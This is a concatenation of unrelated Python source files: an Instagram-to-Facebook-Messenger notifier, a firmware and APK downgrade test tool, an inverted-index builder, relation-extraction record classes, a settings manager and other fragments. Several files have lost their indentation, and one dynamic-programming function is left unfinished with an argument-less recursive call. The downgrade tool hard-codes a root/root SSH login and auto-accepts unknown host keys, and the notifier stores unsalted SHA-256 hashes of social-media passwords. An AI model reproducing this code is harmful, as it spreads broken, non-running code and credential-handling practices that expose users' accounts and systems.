    """Check user_/passw against the stored SHA-256 hash for `service`.

    service must be 'instagram' or 'facebook'; returns True only when the
    password hash matches the stored one.
    """
    # The two service branches were character-for-character identical, so
    # they are merged into a single membership test.
    if service not in ('instagram', 'facebook'):
        print('Unknown service')
        return False
    results = database.get_from_users(username=user_, service=service)
    if len(results) == 0:
        print('User not registered.')
        return False
    # the query returns a list of tuples; first column is the hash
    password_hash = str(results[0][0])
    digest_ = hashes.Hash(hashes.SHA256(), backend=default_backend())
    digest_.update(bytes(passw, 'utf8'))
    if password_hash == str(digest_.finalize().hex()):
        logger.info('User %s validated on %s', user_, service)
        return True
    logger.warning('User %s not validated on %s. Hash do not match.', user_, service)
    return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Instagram Notifier. It get new posts from user that we want to follow closely and notify other '
'users on facebook messenger')
parser.add_argument('-u', action="store_true", dest='user', help='Add a valid user to the database.')
parser.add_argument('-f', action="store_true", dest='follow', help='Add someone to follow closely.')
parser.add_argument('-n', action="store_true", dest='notify', help='Add someone to get notified on facebook '
'messenger.')
parser.add_argument('-r', action="store_true", dest='run', help='Run Instagram Notifier.')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = vars(args)
username = input('Instagram username: ')
password = getpass(prompt='Instagram password: ')
if args['user']:
flag, api = login(user_=username, passw=password)
if flag:
print('Login success!')
email = input('Facebook email: ')
password_fb = getpass(prompt='Facebook password: ')
try:
client = Client(email, password_fb, logging_level=logging.CRITICAL)
except Exception:
print('Facebook - invalid username or password. Try again!')
else:
print('Login success!')
# Add confirmed user to database
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(bytes(password, 'utf8'))
insta_hash = digest.finalize().hex()
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(bytes(password_fb, 'utf8'))
fb_hash = digest.finalize().hex()
database.insert_user(username=username, password=insta_hash, email=email, password_fb=fb_hash)
logger.info('User %s inserted on database.', username)
client.logout()
else:
print('Invalid username or password. Try again!')
exit()
if args['follow']:
if validate_user(user_=username, passw=password, service='instagram'):
# flag will be always True
flag, api = login(user_=username, passw=password)
follow_user = input('Let\'s follow (you must know the instagram username of the person ): ')
flag, info = follow_closely(api_=api, follow_username=follow_user)
if flag:
# add to the database
id_row = database.insert_follow(user_id=info['pk'], username=info['username'], user=username,
full_name=info['full_name'], is_private=info['is_private'],
profile_pic=info['profile_pic_url'])
# get actual info about feed and save it
data = get_info(api_=api, user_id=info['pk'])
database.insert_media(last_media_id=data['last_media_id'], media_count=data['media_count'],
foreign_id=id_row, last_media=data['last_media'], width=data['width'],
height=data['height'], location=data['location'])
logger.info('User %s is now following closely %s.', username, follow_user)
else:
print('You are not following the user with the instagram username: ' + follow_user)
else:
print('Invalid username or password. Try again!')
exit()
if args['notify']:
email = input('Facebook email: ')
password_fb = getpass(prompt='Facebook password: ')
if validate_user(user_=email, passw=password_fb, service='facebook'):
client = Client(email=email, password=password_fb, logging_level=logging.CRITICAL)
notify = input('Let\'s notify (you must know the facebook name of the person ): ')
# It take in consideration only the first 10 friends, exclude non friends
notify = client.searchForUsers(name=notify, limit=10)
friends = sorted([x for x in notify if x.is_friend], key=lambda x: x.uid)
print('There are many friends with this name: ')
print('\n'.join('{} -> name: {}, photo: {}'.format(i, k.name, k.photo) for i, k in
enumerate(friends)))
io = input('Choose one of them: ')
notify = friends[int(io)]
print('This person should receive notifications about whom?')
follow_ = sorted([f[1] for f in database.get_from_follows(username=username)])
print('\n'.join('{}: {}'.format(*k) for k in enumerate(follow_)))
to_notify = input('Choose the people you want to notify(ie: 1,2): ')
to_notify = [int(s.replace(' ', '')) for s in to_notify.split(',')]
to_notify = [follow_[x] for x in to_notify]
for person in to_notify:
id_follow = database.get_from_follows_find(username=username, username_follow=person)[0]
database.insert_notify(foreign_id=id_follow, thread_id=notify.uid, thread_type=0, image_flag=1)
logger.info('User %s will notify %s about something.', username, notify)
if args['run']:
if validate_user(user_=username, passw=password, service='instagram'):
# flag will be always True
flag, api = login(user_=username, passw=password)
run(api_=api, user_=username)
|
993,553 | a5898d91c7889e9a0f2edb98e8ae3194d378cd0a | import re
from ePhone7.utils.spud_serial import SpudSerial
from ePhone7.config.configure import cfg
import spur
from lib.user_exception import UserException as Ux
from lib.wrappers import Trace
import lib.logging_esi as logging
from pyand import ADB, Fastboot
from os import path, listdir, mkdir
import shutil
log = logging.get_logger('esi.versions')
__all__ = ['get_installed_versions', 'force_aosp_downgrade', 'remove_apk_upgrades', 'get_current_versions']
@Trace(log)
def get_installed_versions():
    # Query the device for the installed AOSP build id (serial-console
    # getprop) and the installed app version (adb dumpsys).
    # Returns (aosp_version, apk_version); either may be None if not found.
    re_aosp = re.compile('\[ro\.build\.id\]:\s+\[(.*)\]')
    re_apk = re.compile('(?ms).*Packages:.*?versionName=(\d+\.\d+\.\d+)')
    action = {'cmd': 'getprop\n', 'timeout': 10}
    aosp_version = None
    apk_version = None
    log.debug("Creating SpudSerial device")
    ss = SpudSerial(cfg.site['SerialDev'])
    log.debug("Flushing SpudSerial device")
    ss.flush(1)
    log.debug("SpudSerial device created")
    (reply, elapsed, groups) = ss.do_action(action)
    for line in reply.split('\n'):
        if re_aosp.match(line):
            # matches are scanned in order; the last matching line wins
            aosp_version = re_aosp.match(line).group(1)
    adb = ADB()
    m = re_apk.match(adb.run_cmd('shell dumpsys package com.esi_estech.ditto'))
    if m:
        apk_version = m.group(1)
    return aosp_version, apk_version
@Trace(log)
def remove_apk_upgrades():
    # Repeatedly uninstall the app package over the serial console until the
    # device reports Failure, i.e. no more upgrade layers are left to remove.
    ss = SpudSerial(cfg.site['SerialDev'])
    action = {'cmd': 'pm uninstall com.esi_estech.ditto\n', 'expect': 'Success|Failure', 'timeout': 20}
    while True:
        (reply, elapsed, groups) = ss.do_action(action)
        if groups[0] == 'Failure':
            break
@Trace(log)
def get_current_versions(ota_server):
    # Fetch build.prop for the given OTA release over SSH and parse out the
    # current AOSP build id and app version.  Raises Ux if either is missing.
    build_prop_server = cfg.site["BuildPropServer"]
    # get the current version from the build server
    shell = spur.SshShell(
        hostname=build_prop_server,
        username='ubuntu',
        private_key_file='ePhone7/keys/OTAServer2.pem',
        missing_host_key=spur.ssh.MissingHostKey.accept
    )
    with shell:
        result = shell.run(['cat', '/www/aus/releases/%s/build.prop' % ota_server])
    current_aosp = None
    current_app = None
    aosp_prefix = 'ro.build.id='          # legacy key name
    aosp_new_prefix = 'system.version='   # newer key name; later lines win
    app_prefix = 'app.version='
    for line in result.output.split('\n'):
        line = line.strip()
        if line.startswith(aosp_prefix):
            current_aosp = line[len(aosp_prefix):]
        elif line.startswith(aosp_new_prefix):
            current_aosp = line[len(aosp_new_prefix):]
        elif line.startswith(app_prefix):
            current_app = line[len(app_prefix):]
    if current_aosp is None:
        raise Ux("current_aosp not found")
    elif current_app is None:
        raise Ux("current_app not found")
    return current_aosp, current_app
@Trace(log)
def force_aosp_downgrade(version):
actions = [
{'cmd': 'reboot\n', 'new_cwd': '', 'expect': 'Hit any key to stop autoboot:', 'timeout': 30,
'dead_air_timeout': 30},
{'cmd': '\n', 'expect': '=> ', 'timeout': 5},
{'cmd': 'mmc dev 2\n', 'expect': 'mmc2\(part 0\) is current device\n=> '},
{'cmd': 'mmc setdsr 2\n', 'expect': 'set dsr OK, force rescan\n=> '},
{'cmd': 'fastboot\n', 'expect': '0x4\nUSB_RESET\nUSB_PORT_CHANGE 0x4\n'}
]
ss = SpudSerial(cfg.site['SerialDev'])
for action in actions:
(reply, elapsed, groups) = ss.do_action(action)
log.debug('[%5.3fs] cmd %s, expect %s, received %d chars'
% (elapsed, repr(action['cmd']), repr(action['expect']), len(reply)))
ss.connection.reset_input_buffer()
fb = Fastboot()
fb_cmds = [
"flash boot %s" % path.join(cfg.site["AospsHome"], version, "boot.img"),
"flash system %s" % path.join(cfg.site["AospsHome"], version, "system.img"),
"flash recovery %s" % path.join(cfg.site["AospsHome"], version, "recovery.img"),
"reboot"
]
for cmd in fb_cmds:
log.debug(">>> fastboot " + cmd)
log.debug(fb.run_cmd(cmd))
ss.do_action({'cmd': '', 'new_cwd': '', 'expect': 'mtp_open', 'timeout': 600, 'dead_air_timeout': 60})
@Trace(log)
def force_app_downgrade(version):
    # Install the given (older) APK with -r -d (reinstall + allow version
    # downgrade), then reboot and wait for 'mtp_open' on the console.
    ss = SpudSerial(cfg.site['SerialDev'])
    adb = ADB()
    # NOTE(review): 'string_escape' is a Python 2-only codec — this file
    # appears to target Python 2 (see the print statements further down).
    log.debug(adb.run_cmd("install -r -d %s.apk" % path.join(cfg.site["ApksHome"], version)).encode('string_escape'))
    action = {'cmd': 'reboot\n', 'new_cwd': '', 'expect': 'mtp_open', 'timeout': 120}
    ss.do_action(action)
@Trace(log)
def get_downgrade_images(downgrade_aosp, downgrade_app=None):
build_image_server = cfg.site["BuildImageServer"]
aosps_home = cfg.site["AospsHome"]
apks_home = cfg.site["ApksHome"]
# make sure both aosps_home and apks_home directories exist
try:
mkdir(aosps_home)
except OSError:
pass
try:
mkdir(apks_home)
except OSError:
pass
# make sure the downgrade versions of the aosp and apk are available
aosp_dirs = listdir(aosps_home)
apks = listdir(apks_home)
if downgrade_aosp not in aosp_dirs:
mkdir(path.join(aosps_home, downgrade_aosp))
shell = spur.SshShell(
hostname=build_image_server,
username='root',
password='root',
missing_host_key=spur.ssh.MissingHostKey.accept
)
aosp_downgrade_images = listdir(path.join(aosps_home, downgrade_aosp))
with shell:
for basename in ['boot', 'system', 'recovery']:
img_filename = basename + '.img'
remote_img_path = 'aosps/%s/%s' % ('_'.join(['build'] + downgrade_aosp.split('.')), img_filename)
print "remote file: " + remote_img_path
local_img_path = path.join(aosps_home, downgrade_aosp, img_filename)
print "local file: " + local_img_path + '...',
if img_filename in aosp_downgrade_images:
print "already downloaded to test host"
else:
print "downloading to test host"
with shell.open(remote_img_path, 'rb') as remote_file:
with open(local_img_path, 'wb') as local_file:
shutil.copyfileobj(remote_file, local_file)
if downgrade_app is not None:
remote_apk_filename = 'update.apk.%02d%02d%02d' % tuple([int(n) for n in downgrade_app.split('.')])
local_apk_filename = downgrade_app + '.apk'
remote_apk_path = 'apks/' + remote_apk_filename
local_apk_path = path.join(apks_home, local_apk_filename)
print "remote file: " + remote_apk_path
print "local file: " + remote_apk_path + '...',
if local_apk_filename in apks:
print "already downloaded to test host"
else:
print "downloading to test host"
with shell.open(remote_apk_path, 'rb') as remote_file:
with open(local_apk_path, 'wb') as local_file:
shutil.copyfileobj(remote_file, local_file)
|
993,554 | 973f272413cd877b49e1440082c61c47dcb360a4 |
# Target string: the complete lowercase alphabet.
STANDARD = 'abcdefghijklmnopqrstuvwxyz'
# Module-level memo cache for DP(): substring -> minimal cost.
DP_memo = {}
def is_alphabetical_order(S):
    """Return True if S is a run of consecutive characters ('abc', 'xyz').

    BUG FIX: the original compared `S != ch(a_pos)`; `ch` is a one-character
    string, not a callable, so every call raised TypeError.  The intent is
    to compare each character against chr(a_pos).
    """
    a_pos = ord(S[0])
    for ch in S:
        if ch != chr(a_pos):
            return False
        a_pos += 1
    return True
def is_alphabet(S):
    """Return True when S is exactly the full lowercase alphabet."""
    return S == STANDARD
def DP(S):
    '''
    Subproblem: choose where 'a' starts.

    NOTE(review): this function is unfinished — the final branch calls
    DP( ) with no argument inside min(), and the memoised value is never
    returned after being stored.  Documented as-is; do not call until
    completed.
    '''
    if DP_memo.get(S):
        return DP_memo[S]
    if is_alphabet(S):
        DP_memo[S] = 0
    else:
        if is_alphabetical_order(S):
            # Only missing characters at the end need to be appended.
            DP_memo[S] = 26 - len(S)
        else:
            DP_memo[S] = min( DP( ) )
|
993,555 | 2f66d6c6696934b7dafbe0a691c0c1cf6c07f025 | import nltk
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
import string
import json
lemmatizer = WordNetLemmatizer()
class InvertedIndex:
    """Build an inverted index (term -> postings list) from rows of
    [docId, content].

    All document texts are joined with a long sentinel separator so each
    normalisation pass (cleanup, stop-word removal, lemmatisation) runs
    once over a single string; create_documents() splits it back into one
    chunk per document.
    """

    custom_separator = "1111111111111111111111111"

    def __init__(self, array_content):
        # BUG FIX: documents / index / process_content used to be CLASS
        # attributes, so every InvertedIndex instance shared (and kept
        # appending to) the same index dict and document list.  They are
        # per-instance state now.
        self.documents = []
        self.index = {}
        self.process_content = ""
        self.docIds = array_content[:,0]
        self.content = array_content[:,1]  # [[textKey, content]]
        print("self.docIds len", len(self.docIds))
        print("self.content", len(self.content))
        self.preprocessing_content()
        self.create_documents()

    def preprocessing_content(self):
        # Normalisation pipeline; order matters (separator goes in first).
        self.add_separator()
        self.remove_blank_spaces()
        self.remove_special_chars()
        self.remove_stop_words()
        self.lemmatizer_all()

    def add_separator(self):
        # Join all documents into one string, separated by the sentinel.
        self.process_content = self.custom_separator.join(self.content)
        self.process_content = self.process_content.replace("\n", " ")
        print("separator added")

    def remove_blank_spaces(self):
        # Collapse runs of spaces to a single space.
        self.process_content = re.sub(" +", " ", self.process_content)
        print("remove blank spaces")

    def remove_special_chars(self):
        self.process_content = re.sub(r"[-()\"#/@;:<>{}`+=~|.!?,\*\n]", "", self.process_content)
        print("remove special chars")

    def remove_stop_words(self):
        # Lower-case every token and drop English stop words.
        stop_words = stopwords.words('english')
        tokens_without_sw = [w.lower() for w in self.process_content.split(
            " ") if w.lower() not in stop_words]
        self.process_content = " ".join(tokens_without_sw)
        print("remove stop words")

    def lemmatizer_all(self):
        lemmas_list = [lemmatizer.lemmatize(w)
                       for w in self.process_content.split(" ")]
        self.process_content = " ".join(lemmas_list)
        print("finish lemmatizer")

    def create_documents(self):
        # Split the processed text back into one chunk per input document.
        self.documents = self.process_content.split(self.custom_separator)
        print("self.documents len", len(self.documents))

    def mapper(self, document):
        """Return the term-frequency map for one document (empty tokens ignored)."""
        current_map = {}
        for item in document.split(" "):
            if item != "":
                current_map[item] = current_map.get(item, 0) + 1
        return current_map

    def reducer(self, mapper, docId):
        """Merge one document's term counts into the inverted index."""
        for item in mapper:
            if item not in self.index:
                self.index[item] = []
            self.index[item].append({"docId": docId, "value": mapper[item]})

    def process(self):
        """Run mapper/reducer for every document, aligned with docIds."""
        print("init process")
        count = 0
        for document in self.documents:
            if len(self.docIds) > count:
                current_map = self.mapper(document)
                self.reducer(current_map, self.docIds[count])
                count += 1
        print("finish proccess")

    def saveIndexInDisc(self):
        with open('../output/index.json', 'w') as outfile:
            json.dump(self.index, outfile)
|
993,556 | c5e87c581d030c8aaa904ae4ed5c11b99863fca5 | from collections import namedtuple
from intervaltree import Interval
from rdflib import URIRef
EntityMention = namedtuple('EntityMention', ['start_char', 'end_char', 'uri'])
class RelRecord:
def __init__(self, relation, s0: int, s1: int, o0: int, o1: int,
ctext, cstart=0, cend=None, source_id=None):
self.relation = relation
self.s0 = self.s_start = s0
self.s1 = self.s_end = s1
self.o0 = self.o_start = o0
self.o1 = self.o_end = o1
self.context = ctext
self.cstart = cstart
self.cend = cend if cend is not None else cstart + len(ctext)
self.source_id = source_id if source_id is not None else hash(ctext)
def cut_context(self, begin, end):
self.context = self.context[begin:end]
self.cend = self.cstart + end
self.cstart = self.cstart + begin
self.s0 = self.s_start = max(self.cstart, self.s0)
self.s1 = self.s_end = min(self.s1, self.cend)
self.o0 = self.o_start = max(self.cstart, self.o0)
self.o1 = self.o_end = min(self.o1, self.cend)
assert self.valid_offsets
@property
def direction(self):
"""
Is direction of relation the same as order of (s, o) in the context.
:return: None, True or False
"""
return None if not bool(self.relation) else (self.s_end <= self.o_start)
@property
def valid_offsets(self):
return ((self.cstart <= self.s_start < self.s_end <= self.cend) and
(self.cstart <= self.o_start < self.o_end <= self.cend) and
disjoint(self.s_span, self.o_span))
@property
def s_startr(self): return self.s_start - self.cstart # offsets in dataset are relative to the whole document, not to the sentence
@property
def s_endr(self): return self.s_end - self.cstart
@property
def o_startr(self): return self.o_start - self.cstart
@property
def o_endr(self): return self.o_end - self.cstart
@property
def s_span(self): return (self.s_start, self.s_end)
@property
def o_span(self): return (self.o_start, self.o_end)
@property
def s_spanr(self): return (self.s_startr, self.s_endr)
@property
def o_spanr(self): return (self.o_startr, self.o_endr)
@property
def subject_text(self): return self.context[self.s_startr: self.s_endr]
@property
def object_text(self): return self.context[self.o_startr: self.o_endr]
@property
def subject(self): return self.subject_text
@property
def object(self): return self.object_text
@property
def triple(self): return (self.subject, self.relation, self.object)
def __hash__(self): return hash(self.id)
def __eq__(self, other): return self.id == other.id
@property
def id(self):
return (self.source_id, (self.cstart, self.cend),
self.s_span, self.o_span, self.triple)
def __str__(self):
return '\n'.join((' '.join('<{}>'.format(x) for x in self.triple), self.context.strip()))
class RelationRecord(RelRecord):
    """RelRecord whose subject/object are knowledge-base URIs rather than
    the raw surface strings from the context."""
    def __init__(self, s: URIRef, r: URIRef, o: URIRef,
                 s0: int, s1: int, o0: int, o1: int,
                 ctext, cstart=0, cend=None, source_id=None):
        self.subject_uri = s
        self.relation = r
        self.object_uri = o
        super().__init__(r, s0, s1, o0, o1, ctext, cstart, cend, source_id)
    @property
    def subject(self): return self.subject_uri  # overrides the surface-text subject
    @property
    def object(self): return self.object_uri    # overrides the surface-text object
class EntityRecord:
    """An entity mention inside a ContextRecord's text."""
    def __init__(self, crecord, start, end, uri):
        """
        :param uri: original uri
        :param start: char offset of the start in crecord.context (inclusive)
        :param end: char offset of the end in crecord.context (exclusive)
        :param crecord: source of entity: ContextRecord
        """
        self.crecord = crecord
        self.start = start
        self.end = end
        self.uri = uri
    @property
    def start_char(self): return self.start
    @property
    def end_char(self): return self.end
    @property
    def text(self):
        # The entity's surface form, sliced out of the owning context.
        return self.crecord.context[self.start: self.end]
    @property
    def span(self):
        # (start, end) relative to the owning context.
        return self.start, self.end
    @property
    def spang(self):
        # (start, end) in global (document) coordinates.
        s = self.crecord.start
        return s+self.start, s+self.end
    def cut_context(self, begin, end):
        # Clip offsets after the owning context was cut to [begin:end].
        # NOTE(review): start is shifted by -begin but end is only capped,
        # not shifted — compare RelRecord.cut_context; this looks
        # inconsistent for begin > 0.  Confirm before relying on it.
        self.start = max(0, self.start - begin)
        self.end = min(self.end, end)
    def json(self):
        return self.span, self.uri
    def __str__(self):
        return '[{}:{}] {}'.format(self.start, self.end, self.text.strip())
class ContextRecord:
    """A span of text (e.g. a sentence) from an article, plus its entities."""

    @classmethod
    def from_span(cls, span, artid, ents=None):
        """Build from an object exposing .text/.start_char/.end_char (e.g. a spaCy span)."""
        return cls(span.text, span.start_char, span.end_char, artid, ents)

    def __init__(self, ctext, cstart, cend, artid, ents=None):
        self.context = ctext   # raw text of the span
        self.start = cstart    # char offset of the span start in the article
        self.end = cend        # char offset of the span end in the article
        self.article_id = artid
        self.ents = [] if ents is None else ents

    def cut_context(self, begin, end):
        """Trim the context to context[begin:end]; offsets stay article-relative."""
        self.context = self.context[begin:end]
        self.end = self.start + end
        self.start = self.start + begin
        for e in self.ents:
            e.cut_context(begin, end)

    @property
    def start_char(self): return self.start

    @property
    def end_char(self): return self.end

    @property
    def span(self):
        return self.start, self.end

    def json(self):
        # BUG FIX: e.json is a method; it was previously emitted un-called,
        # yielding bound-method objects instead of serialisable tuples.
        return (self.article_id, self.span, self.context, [e.json() for e in self.ents])

    def __str__(self):
        return self.context.strip() + '(' + '; '.join(str(e) for e in self.ents) + ')'
def disjoint(span1, span2):
    # True when the two (start, end) spans do not overlap at all.
    # NOTE(review): relies on an `Interval` type imported elsewhere in this
    # module (not visible here); confirm its open/closed endpoint semantics
    # (i.e. whether touching spans count as overlapping) before changing this.
    return not Interval(*span1).overlaps(*span2)
|
993,557 | 76492508248f5e3e9e63df1d6892da62d1b405d0 | from django.views.generic import CreateView
from contact.forms import EmailForm
class HomeView(CreateView):
    """Landing page doubling as a contact form: renders the index template
    and, on a valid POST, creates an email record then redirects to the
    thanks page."""
    template_name = 'vitali/index.html'
    form_class = EmailForm
    success_url = '/contact/thanks/'
|
993,558 | 2b329aa4cc5611cdab25356a6fdecc91af0bcd99 | import os
# todo: remove debugging feature. Just use the built in debugging tools.
class Settings:
    """Persistent program settings backed by a plain-text ``settings.dat`` file.

    On construction the settings are loaded from disk; if the file is
    missing, documented defaults are written out instead.  Note that values
    loaded from disk are strings except 'true'/'false' (parsed to bool).
    """

    def __init__(self, debug=False):
        """Load settings from settings.dat, creating it with defaults if absent.

        :param debug: when True, print each parsed settings line while loading
        """
        self.valid_settings = ['DEBUG', 'INLINE_GRAPHS', 'LIN_SORTING_METHOD',
                               'NL_FITTING_METHOD', 'NL_SORTING_METHOD',
                               'PLOT_GRAPHS', 'SAVE_GRAPHS', 'AUTO_LIN', 'AUTO_NL', 'DO_LIN',
                               'DO_NL', 'TREAT_ALL', 'EXT', 'PREV_EXTRACTED', 'WAIT', 'FIXED_FP_NL',
                               'MAX_FP_NL']
        self.valid_options_lin_sorting = ['by_error', 'by_error_length', 'by_R2']
        self.valid_options_nl_sorting = ['eta_0', 'overall', 'R2']
        self.models = ['Carreau', 'Cross', 'Carreau-Yasuda']
        self.DEBUG = bool(debug)
        try:
            self.load_settings()
        except FileNotFoundError:
            print('Settings file not found. Loading defaults.')
            self.DEBUG = False
            self.INLINE_GRAPHS = False
            self.LIN_SORTING_METHOD = 'by_error_length'  # by_error, by_error_length, by_R2
            self.NL_FITTING_METHOD = 'Carreau'  # Carreau, Cross, Carreau-Yasuda
            self.NL_SORTING_METHOD = 'overall'  # eta_0, overall, R2
            self.PLOT_GRAPHS = False
            self.SAVE_GRAPHS = False
            self.AUTO_LIN = True
            self.AUTO_NL = True
            self.DO_LIN = True
            self.DO_NL = True
            self.TREAT_ALL = False
            self.EXT = 'txt'
            self.PREV_EXTRACTED = False
            self.WAIT = '0.5'
            self.FIXED_FP_NL = True
            self.MAX_FP_NL = 2
            print('Creating a new settings file with the defaults')
            self.save_settings()

    def save_settings(self):
        """Write every current setting, with explanatory comments, to settings.dat."""
        with open('settings.dat', 'w') as settings_file:
            settings_file.write('#This is an automatically created settings file.\n')
            settings_file.write('\n# Inline graphs is meant for those with IDEs like Jupyter Notebooks\n')
            settings_file.write('INLINE_GRAPHS=' + str(self.INLINE_GRAPHS))
            settings_file.write(
                '\n# Plot graphs after fitting, with error propagation? Slows down the process greatly.\n')
            settings_file.write('PLOT_GRAPHS=' + str(self.PLOT_GRAPHS))
            settings_file.write('\n# Save graphs after fitting? Useless if PLOT_GRAPHS is set to False\n')
            settings_file.write('SAVE_GRAPHS=' + str(self.SAVE_GRAPHS))
            settings_file.write('\n# When plotting, time it waits until the next plot is shown,'
                                ' in seconds\n')
            settings_file.write('WAIT=' + str(self.WAIT))
            settings_file.write('\n# Treat all files in folder?\n')
            settings_file.write('TREAT_ALL=' + str(self.TREAT_ALL))
            settings_file.write('\n# Extension of files to look for\n')
            settings_file.write('EXT=' + str(self.EXT))
            settings_file.write('\n# If the important data has been extracted\n')
            settings_file.write('PREV_EXTRACTED=' + str(self.PREV_EXTRACTED))
            settings_file.write('\n\n#### Linear Fitting ####')
            settings_file.write('\n# Perform linear fit?\n')
            settings_file.write('DO_LIN=' + str(self.DO_LIN))
            settings_file.write(
                "\n# Sorting method of the automatic linear method.\n# Can be 'by_error', minimizing the " +
                "error, 'by_error_length', which minimizes the error divided by the total number of " +
                "points used, 'by_R2', which minimizes R squared.\n")
            settings_file.write('LIN_SORTING_METHOD=' + str(self.LIN_SORTING_METHOD))
            settings_file.write('\n# Set to True if you want the linear fitting to be done automatically. ' +
                                'False, if to be done manually.\n')
            settings_file.write('AUTO_LIN=' + str(self.AUTO_LIN))
            settings_file.write('\n\n#### Non-Linear Fitting ####')
            settings_file.write('\n# Perform non-linear fitting?\n')
            settings_file.write('DO_NL=' + str(self.DO_NL))
            settings_file.write("\n# Fitting method. 'Carreau', 'Cross', 'Carreau-Yasuda'\n")
            settings_file.write('NL_FITTING_METHOD=' + str(self.NL_FITTING_METHOD))
            settings_file.write("\n# Can be 'overall', minimizing the error of all parameters, 'eta_0', " +
                                "minimizing the error of only this parameter, or 'R2'.\n")
            settings_file.write('NL_SORTING_METHOD=' + str(self.NL_SORTING_METHOD))
            settings_file.write('\n# Set to True if you want the non linear fitting to be done automatically\n')
            settings_file.write('AUTO_NL=' + str(self.AUTO_NL))
            settings_file.write('\n# Set to true if the first point should be fixed during fitting\n')
            settings_file.write('FIXED_FP_NL=' + str(self.FIXED_FP_NL))
            settings_file.write('\n# If FIXED_FP_NL is true, how much can it travel? This must be in terms of the'
                                'inverse of the length, that is, length/MAX_FP_NL. 1 would be the entire curve (not'
                                'recommended. 2 would be up to half the curve, etc.\n')
            settings_file.write('MAX_FP_NL=' + str(self.MAX_FP_NL))
            settings_file.write('\n\n##### Debug #####\n')
            settings_file.write('# Show debug messages\n')
            settings_file.write('DEBUG=' + str(self.DEBUG))

    def load_settings(self):
        """Populate attributes from settings.dat.

        'true'/'false' values become booleans; everything else stays a string
        (so numeric settings such as WAIT and MAX_FP_NL are strings after a
        load).  Raises FileNotFoundError when the file does not exist.
        """
        with open('settings.dat', 'r') as fhand:
            for line in fhand:
                if line.startswith('#'):
                    continue
                if len(line) < 4:
                    # Skip blank / near-empty lines.
                    continue
                line = line.rstrip()
                line = line.replace(' ', '')
                # NOTE: assumes a single '=' per line; a value containing '='
                # would raise ValueError here.
                param, value = line.split('=')
                if self.DEBUG:
                    print(line)
                    # Bug fix: the original printed `param` for both fields.
                    print(f'Var = {param} val= {value}')
                # todo: think about using getattr
                if (not hasattr(self, param)) and (param in self.valid_settings):  # not loaded yet and valid
                    if value.lower() == 'true':  # Assigns booleans first
                        setattr(self, param, True)
                    elif value.lower() == 'false':
                        setattr(self, param, False)
                    else:
                        setattr(self, param, value)  # todo: check if the parameter is valid, i.e. Carreau
                elif param not in self.valid_settings:
                    print(f"Settings file has an unrecognized parameter {param} which wasn't loaded.")
                    continue

    def print_settings(self):
        """Print each setting with its valid options.

        :returns: (valid_numbers, number_setting_corr) — the menu numbers as
                  strings, and the number -> setting-name mapping.
        """
        counter = 0
        valid_numbers = []
        number_setting_corr = {}  # To assign a number to a parameter. Ex: 1: 'EXT'
        for param in self.valid_settings:
            sett = getattr(self, param)
            print(f"{counter}) {param} = {sett}", end='')
            if isinstance(sett, bool):  # idiomatic type check (was: type(sett) == bool)
                print(': Options= True | False')
            elif param == 'LIN_SORTING_METHOD':
                print(': Options= ', end='')
                print(*self.valid_options_lin_sorting, sep=' | ')
            elif param == 'NL_FITTING_METHOD':
                print(': Options= ', end='')
                print(*self.models, sep=' | ')
            elif param == 'NL_SORTING_METHOD':
                print(': Options= ', end='')
                print(*self.valid_options_nl_sorting, sep=' | ')
            elif param == 'EXT':
                print(': Options = txt | dat | csv | etc...')
            elif param == 'WAIT':
                print(': Options = time in seconds')
            elif param == 'MAX_FP_NL':
                print(': Options = 1/n. n=1: whole curve. n=2: half')
            else:
                print('\n')
            valid_numbers.append(str(counter))
            number_setting_corr[str(counter)] = param
            counter += 1
        print('\n===================\n')
        if self.DEBUG:
            print('Valid numbers', valid_numbers)
            print('Correlation', number_setting_corr)
        return valid_numbers, number_setting_corr

    def edit_settings(self):
        """Interactively edit the current settings, then persist them to disk."""
        while True:
            os.system('cls' if os.name == 'nt' else 'clear')
            valid_numbers, number_setting_corr = self.print_settings()
            print('Which setting you want to change? Enter "number, new value" to modify, or "done" to exit.')
            print('Observe the possible values for each setting! They are case sensitive. '
                  'Inputting wrong values might break the program. \n')
            choice = input('Input:')
            if choice == 'done':
                break
            if ',' not in choice:
                print('Invalid input. Place the number, followed by a comma, followed by its value. Eg: 1,TRUE')
                continue
            if len(choice.split(',')) != 2:
                print('Invalid input, must have only one comma')
                continue
            var, val = choice.split(',')
            if var not in valid_numbers:
                print('Invalid number.')
                continue
            real_var = number_setting_corr[var]  # Changes from a number to the actual parameter
            if val.lower() == 'true':
                setattr(self, real_var, True)
                continue
            elif val.lower() == 'false':
                setattr(self, real_var, False)
                continue
            else:
                setattr(self, real_var, val)
            # todo: validate non-boolean values against valid_options_lin_sorting,
            # valid_options_nl_sorting and models to avoid saving broken settings.
        print('===Final settings===')
        _, _ = self.print_settings()
        self.save_settings()
        return
#
# settings = {
# 'DEBUG': False,
# 'INLINE_GRAPHS': False,
# 'SORTING_METHOD_LIN': 'by_error_length', # by_error, by_error_length
# 'NL_FITTING_METHOD': 'Carreau', # Carreau, Cross, Carreau-Yasuda
# 'SORTING_METHOD_NL': 'overall', # eta_0, overall
# 'PLOT_GRAPHS': False,
# 'SAVE_GRAPHS': False,
# 'AUTO_LIN': True,
# 'AUTO_NL': True,
# 'DO_LIN': True,
# 'DO_NL': True,
# 'TREAT_ALL': False,
# 'EXT': 'txt',
# 'PREV_EXTRACTED': False
# }
#
# valid_options_lin_sorting = ['by_error', 'by_error_length']
# valid_options_nl_sorting = ['eta_0', 'overall']
# models = ['Carreau', 'Cross', 'Carreau-Yasuda'] |
993,559 | cd27a3ffbdb8538b7f2f7bed70ff913b5b7d14e4 | import cv2 as cv
import numpy as np
def skeletonize(image):
    """Morphologically skeletonize a binary mask and pick a navigation goal point.

    Returns a (row, col) pixel of the skeleton sampled along three probe
    segments (left column 350, right column 650, top row 300); falls back to
    [300, 500] when no skeleton pixel is hit.
    NOTE(review): the ROI bounds and probe lines are hard-coded for one
    specific image size — confirm before reusing on other resolutions.
    """
    goal_point = [300, 500]
    img = image
    wh_pixels_up = []
    wh_pixels_left = []
    wh_pixels_right = []
    thresh_erode = img.copy()
    skel = np.zeros(img.shape, np.uint8)
    element = cv.getStructuringElement(cv.MORPH_CROSS, (3, 3))
    # Classic morphological skeleton: repeatedly erode, accumulating the
